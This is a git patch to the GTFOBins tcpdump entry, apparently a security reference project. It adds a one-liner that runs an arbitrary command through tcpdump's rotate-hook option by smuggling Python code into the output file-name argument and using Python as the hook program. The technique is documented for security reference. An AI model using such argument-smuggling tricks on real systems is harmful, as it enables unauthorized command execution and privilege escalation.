From 387651d444273b7df95e61d9a45e1b6c4eacae4f Mon Sep 17 00:00:00 2001 From: beaujeant <1451321+beaujeant@users.noreply.github.com> Date: Thu, 30 May 2024 00:01:36 +0200 Subject: [PATCH] Update tcpdump (adding one-line with arbitrary command) --- _gtfobins/tcpdump.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md index e57de317..2337f960 100644 --- a/_gtfobins/tcpdump.md +++ b/_gtfobins/tcpdump.md @@ -5,12 +5,16 @@ description: | In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following. functions: command: - - code: | + - description: This requires several commands. + code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF + - descprition: One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value. + code: | + tcpdump -ln -i lo -w -c__import__\(\"os\"\).system\(\"id\"\) -W 1 -G 1 -z /usr/bin/python sudo: - code: | COMMAND='id'